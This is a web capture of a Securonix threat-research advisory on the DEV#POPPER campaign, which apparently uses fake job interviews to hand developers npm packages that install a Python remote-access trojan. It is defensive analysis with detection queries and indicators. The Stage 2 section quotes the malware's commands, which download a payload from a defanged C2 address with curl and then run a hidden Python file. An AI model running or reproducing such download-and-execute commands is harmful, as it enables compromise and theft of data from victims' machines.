www.securonix.com
Open in
urlscan Pro
2606:4700:3108::ac42:2b19
Public Scan
URL:
https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-w...
Submission: On April 29 via api from TR — Scanned from DE
Submission: On April 29 via api from TR — Scanned from DE
Form analysis 1 forms found in the DOM
https://www.securonix.com/
<form autocomplete="off" action="https://www.securonix.com/">
<div class="search-field">
<input type="text" placeholder="Search" name="s" id="search-input">
<button><i class="icon-search"></i></button>
</div>
</form>Text Content
* Blog
* Contact Us
* Request a Demo
* Products
* * Overview
* Platform
* ‘Bring Your Own’ Deployment Models
* Bring Your Own Snowflake
* Bring Your Own AWS
* * Products
* Unified Defense SIEM
* UEBA
* SOAR
* ATS
* Investigate
* Why Securonix?
* * Why Securonix?
* Threat Labs
* Analyst Resources
* Compare Us
* * Featured – Gartner® Peer Insights™ 2023 Customers’ Choice for Security
Information and Event Management
Learn More
* Solutions
* * Monitoring the Cloud
* Cloud Security Monitoring – Gain visibility to detect and respond to
cloud threats.
* Amazon Web Services – Achieve faster response to threats across AWS.
* Google Cloud Platform – Improve detection and response across GCP.
* Microsoft Azure – Expand security monitoring across Azure services.
* Microsoft 365 – Benefit from detection and response on Office 365.
* * Featured Use Case
* Insider Threat – Monitor and mitigate malicious and negligent users.
* NDR – Analyze network events to detect and respond to advanced threats.
* EMR Monitoring – Increase patient data privacy and prevent data
snooping.
* MITRE ATT&CK – Align alerts and analytics to the MITRE ATT&CK
framework.
* * Industries
* Financial Services
* Healthcare
* Resources
* * Resource Library
* Case Studies
* Resources by Topic
* SIEM
* UEBA
* Cloud Security
* Insider Threat
* Information Security
* Security Analytics
* * Featured – 2022 Gartner® Magic Quadrant™ For SIEM
Learn More
* Partners
* * Global System Integrators
* MSSPs
* Solution Providers
* Technology Alliance
* Distributors
* Partner Portal Login
* Company
* * About
* Leadership
* Newsroom
* Press
* Events
* Awards
* Blog
* Contact Us
* Request a Demo
Blog
ANALYSIS OF DEV#POPPER: NEW ATTACK CAMPAIGN TARGETING SOFTWARE DEVELOPERS LIKELY
ASSOCIATED WITH NORTH KOREAN THREAT ACTORS
Threat Research
Share
LinkedInTwitterFacebookTeilen
SECURONIX THREAT RESEARCH SECURITY ADVISORY – FAST TRACK/EARLY-WARNING COVERAGE
ADVISORY (FCA)
EARLY DRAFT – ANALYSIS OF DEV#POPPER: NEW ATTACK CAMPAIGN TARGETING SOFTWARE
DEVELOPERS LIKELY ASSOCIATED WITH NORTH KOREAN THREAT ACTORS
BY SECURONIX THREAT RESEARCH: D.IUZVYK, T. PECK, O.KOLESNIKOV
Apr 24, 2024
TLDR:
The Securonix Threat Research Team has been monitoring a new ongoing social
engineering attack campaign (tracked by STR as DEV#POPPER) likely associated
with North Korean threat actors who are targeting developers using fake
interviews to deliver a Python-based RAT.
The Threat Research team has been investigating a new threat campaign (tracked
by STR as DEV#POPPER) that’s been targeting software developers. STR has been
able to identify malicious software repositories used by attackers as part of
the attack campaign, which we’ll delve deeper into to get a better understanding
as to how the malicious threat actors infect systems and their capabilities.
Introduction
Social engineering is an advanced tactic used by threat actors to manipulate
individuals into divulging confidential information or performing actions that
they might normally not. The attacker’s goal is to trick the user into
unknowingly compromising themselves or place of employment. Unlike traditional
hacking methods which rely on exploitation, social engineering targets human
vulnerabilities by exploiting psychological manipulation. This method plays on
basic human traits such as trust, fear or the desire to simply be helpful.
In the case of the DEV#POPPER attack campaign we’ve been observing, an
interesting form of social engineering was noted which involves the targeting of
specific professional groups such as software developers. This technique, while
not extremely prevalent at the moment, is still ongoing and has been reported a
number of times in the past by North Korean threat actors.
In summary, an example of this is where attackers set up fake job interviews for
developers, pretending to be legitimate job interviewers. During these
fraudulent interviews, the developers are often asked to perform tasks that
involve downloading and running software from sources that appear legitimate,
such as GitHub. The software contained a malicious Node JS payload that, once
executed, compromised the developer’s system.
This method is effective because it exploits the developer’s professional
engagement and trust in the job application process, where refusal to perform
the interviewer’s actions could compromise the job opportunity. The attackers
tailor their approach to appear as credible as possible, often by mimicking real
companies and replicating actual interview processes. This guise of
professionalism and legitimacy lulls the target into a false sense of security,
making it easier to deploy malware without arousing suspicion.
Note – At the time of publication, the attackers GitHub repositories we analyze
below have already been deleted. However, members of the cybersecurity community
have picked up on other GitHub hosted samples as well.
STAGE 1: MALICIOUS NPM PACKAGE
The first stage involves downloading a zip archive from GitHub which would have
been sent to the interviewee from the interviewer. The zip archive contains a
legitimate looking Node Package Manager (NPM) package containing a README.md,
and Frontend and Backend directories.
Buried in the Backend directory was a single JavaScript file which on the
surface appears to be a simple code snippet using Mongoose, which is a Node.js
package that provides MongoDB object modeling in an asynchronous environment.
Figure x: imageDetails.js – unusually long scroll bar
However, closer examination reveals a huge line of highly obfuscated code when
scrolling way over to the right. An example of how large this is can be seen by
looking at the scrollbar in the figure above. The gif in the figure below also
demonstrates this as you can see the obfuscated code past a large comment block
on the right.
Figure x: Video highlighting the malicious JavaScript code out of view
Removing the JavaScript code from imageDetails.js and placing it into its own
file allows us to analyze it a bit easier. The is obfuscated using several
layers of obfuscation including base64 and variable substitutions.
Figure x: Extracted obfuscated JavaScript code from imageDetails.js.
STAGE 2: COMMAND EXECUTION AND PAYLOAD DOWNLOAD
When the victim eventually executes the malicious NPM package, the malicious
JavaScript code in Stage 1 is executed through the NodeJS process (node.exe).
The purpose of the malicious script in Stage 1 is simply to download and extract
an archive file, extract it and then execute the next stage.
Through the node.exe process we observed the following commands:
Command Purpose cmd.exe /d /s /c “curl -lo
“C:\Users\[REDACTED]\AppData\Local\Temp\p.zi”
“hxxp://147.124.214[.]131:1244/pdown” Download next stage payload “p.zi” tar -xf
C:\Users\[REDACTED]\AppData\Local\Temp\p2.zip -c c:\users\[REDACTED]” Using the
tar command, extract zip file into the user’s temp directory cmd.exe /d /s /c
“”c:\users\[REDACTED]\.pyp\python.exe” “c:\users\[REDACTED]\.npl” Run python.exe
and execute the hidden file which was just extracted “.npl”
STAGE 3: PYTHON CODE EXECUTION – .NPL
The “.npl” file is technically a Python file, without an extension and uses a
starting dot “.” to indicate to the operating system that it is a hidden file.
This may or may not be hidden from view to the user depending on their operating
system settings.
The file contains a large base64 payload and uses a combination of string
manipulation and decoding to execute the Python code hidden inside of it. Base64
encoding and XOR logic are used for the content behind the hidden string. This
is then executed as Python code using exec().
Figure x: Python execution .npl file contents
The decoded result contains several key variables such as its current path and a
hard-coded C2 server: hxxp://147.124.214[.]131:1244. The Python script then
calls and executes another Python script which is located at
C:\Users\Redacted\.n2/pay.
STAGE 3: PYTHON CODE EXECUTION – PAY
The “pay” script is also an extensionless file similar to the first Python
script we analyzed. This next script contains similar payload execution tactics
where a Base64 string is decoded in the same fashion, however two unique strings
are executed. Each of these can be seen in the figure below.
Figure x: res – Python file contents
The first decoded code string executes and gathers system and network
information from an infected computer and then sends this data to a remote
server which includes the following:
* Operating system type
* Hostname
* OS release version
* OS version
* Username of the logged-in user
* A unique identifier for the device (uuid) generated by hashing the MAC
address and username
This information is gathered and then transmitted in a JSON-like format back to
the attacker’s C2 server by issuing a carefully crafted HTTP POST request.
The second decoded and executed string is much longer than the first and
contains quite a bit more functionality. Once executed, the script functions
similarly to a RAT (Remote Access Trojan), allowing the attacker to interact
with the victim’s machine remotely. After analyzing the decoded portion of the
script, we observed the following capabilities:
* Networking and session creation: Used for persistent connections: This
establishes persistent TCP connections including structuring and sending JSON
formatted data.
* File system interaction: Contains functions to traverse directories and
filter files based on specific extensions and directories to exclude. It can
also locate and potentially exfiltrate files that do not match certain
criteria (like file size and extension).
* Remote command execution: The script contains several functions which allow
for the execution of system shell commands and scripts.. This includes
browsing the filesystem and executing shell commands.
* Data Handling and transmission: Functionality for encoding data over an
established TCP connection. It handles data reception, decoding different
character encodings and manages transmission errors and timeouts.
* Exfiltration and uploading: For exfiltration,the Python script is able to
send files to a remote FTP server with the ability to filter in or out files
based on its extension. Other functions exist to help automate this process
by collecting data from various user directories like Documents and
Downloads.
* Clipboard and keystroke logging: The script includes capabilities to monitor
and exfiltrate clipboard contents and keystrokes.
SECURONIX RECOMMENDATIONS
When it comes to attacks which originate through social engineering, it’s
critical to maintain a security-focused mindset, especially during intense and
stressful situations like job interviews. The attackers behind the DEV#POPPER
campaigns abuse this, knowing that the person on the other end is in a highly
distracted and in a much more vulnerable state. When it comes to prevention and
detection, the Securonix Threat Research team recommends:
* Raise awareness to the fact that people are targets of social engineering
attacks just as technology is exploitation. Remaining extra vigilant and
security continuous, even during high-stress situations is critical to
preventing the issue altogether.
* In case of code execution, monitor common malware staging directories,
especially script-related activity in world-writable directories. In the case
of this campaign the threat actors staged in subdirectories found in the
user’s %APPDATA% directory.
* Monitor for the usage of non-default scripting languages such as Python on
endpoints and servers which should normally not execute it. To assist in
this, leverage additional process-level logging such as Sysmon and PowerShell
logging for additional log detection coverage.
* Securonix customers can scan endpoints using the Securonix hunting queries
below.
MITRE ATT&CK MATRIX
Tactics Techniques Collection T1560: Archive Collected Data Command and Control
T1132: Data Encoding Defense Evasion T1027.010: Obfuscated Files or Information:
Command Obfuscation
T1070.004: Indicator Removal: File Deletion
Discovery T1033: System Owner/User Discovery
T1082: System Information Discovery Execution T1059.001: Command and Scripting
Interpreter: PowerShell
T1059.003: Command and Scripting Interpreter: Windows Command Shell
T1059.006: Command and Scripting Interpreter: Python
Exfiltration T1041: Exfiltration Over C2 Channel
RELEVANT PROVISIONAL SECURONIX DETECTIONS
* EDR-ALL-930-RU
* EDR-ALL-1246-RU
* NGF-ALL-833-ER
RELEVANT HUNTING QUERIES
(REMOVE SQUARE BRACKETS “[ ]” FOR IP ADDRESSES OR URLS)
* index = activity AND rg_functionality = “Web Proxy” AND (destinationaddress =
“147.124.214[.]131” OR destinationaddress = “173.211.106[.]101”)
* index = activity AND rg_functionality = “Next Generation Firewall” AND
(destinationaddress = “147.124.214[.]131” OR destinationaddress =
“173.211.106[.]101”)
* index = activity AND rg_functionality = “Endpoint Management Systems” AND
(deviceaction = “Network connection detected” OR deviceaction = “Network
connection detected (rule: NetworkConnect)”) AND destinationport=”1244″)
* index = activity AND rg_functionality = “Endpoint Management Systems” AND
(deviceaction = “Process Create” OR deviceaction = “Process Create (rule:
ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =
“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed
Process”) AND destinationprocessname ENDS WITH “python.exe” AND
(destinationprocessname ENDS WITH “cmd.exe” OR destinationprocessname ENDS
WITH “powershell.exe”)
(changed destinationhostname to destinationprocessname and CONTAINS to ENDS
WITH on both)
C2 AND INFRASTRUCTURE
C2 Address 147.124.214[.]131 173.211.106[.]101
ANALYZED FILES/HASHES
File Name SHA256 sports_platform_app-main.zip
45c991529a421104f2edf03d92e01d95774bf54325f9107dd4139505912a0c1e imageDetails.js
33617F0AC01A0F7FA5F64BD8EDEF737F678C44E677E4A2FB23C6B8A3BCD39FA2 .npl
F9CA12321FB91157CCE8513E935810D1C2005AB0739322B474F0CB4AF2605D16 pay
977A9024962102B02128D391C0543C63328D3F26701ECA1A5D282AF4D493DC2E
REFERENCES:
1. Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear
Hallmarks of North Korean Threat Actors
https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/
FacebookTwitterEmailTeilen
PREVIOUS ARTICLE
SECURONIX THREAT RESEARCH SECURITY ADVISORY: ANALYSIS OF ONGOING FROZEN#SHADOW
ATTACK CAMPAIGN LEVERAGING SSLOAD MALWARE AND RMM SOFTWARE FOR DOMAIN TAKEOVER
NEXT ARTICLE
AI-REINFORCED: THE ENGINE POWERING THE SECURONIX CYBEROPS REVOLUTION
RELATED RESOURCE
* Analysis of DEV#POPPER: New Attack Campaign Targeting...
* Securonix Threat Research Security Advisory: Analysis...
* Securonix Threat Research Knowledge Sharing Series:...
* Securonix Threat Research Security Advisory: Analysis...
* Why Securonix?
* Why Securonix?
* Analyst Resources
* Overview
* Compare Us
* Products
* Platform
* Bring Your Own Snowflake
* Bring Your Own AWS
* Unified Defense SIEM
* UEBA
* SOAR
* ATS
* Investigate
* Solutions
* Cloud Security
* Google Cloud Platform
* Microsoft Azure
* Microsoft 365
* Amazon Web Services
* Insider Threat
* NDR
* EMR Monitoring
* Healthcare
* Manufacturing
* Financial Services
* Resources
* Resource Library
* Threat Labs
* Legal Center
* Open Source Software Listing – 5.0
* Open Source Software Listing – 6.0
* Company
* About
* Newsroom
* Careers
* Blog
* Services
* Training
* Support Services
* Professional Services
* Partners
* Global System Integrators
* MSSPs
* Solution Providers
* Technology Alliance
* Distributors
* Partner Portal Login
Securonix 2024. All Rights Reserved
Legal Center | Privacy Policy
*
*
*
*
*
Contact Us
✓
Danke für das Teilen!
AddToAny
Mehr…
×
We Value Your Privacy
Settings
NextRoll, Inc. ("NextRoll") and our 18 advertising partners use cookies and
similar technologies on this site and use personal data (e.g., your IP address).
If you consent, the cookies, device identifiers, or other information can be
stored or accessed on your device for the purposes described below. You can
click "Allow All" or "Decline All" or click Settings above to customise your
consent regarding the purposes and features for which your personal data will be
processed and/or the partners with whom you will share personal data.
NextRoll and our advertising partners process personal data to: ● Store and/or
access information on a device; ● Create a personalised content profile; ●
Select personalised content; ● Personalised advertising, advertising
measurement, audience research and services development; ● Services development.
For some of the purposes above, our advertising partners: ● Use precise
geolocation data. Some of our partners rely on their legitimate business
interests to process personal data. View our advertising partners if you wish to
provide or deny consent for specific partners, review the purposes each partner
believes they have a legitimate interest for, and object to such processing.
If you select Decline All, you will still be able to view content on this site
and you will still receive advertising, but the advertising will not be tailored
for you. You may change your setting whenever you see the Manage consent
preferences on this site.
Decline All
Allow All
Manage consent preferences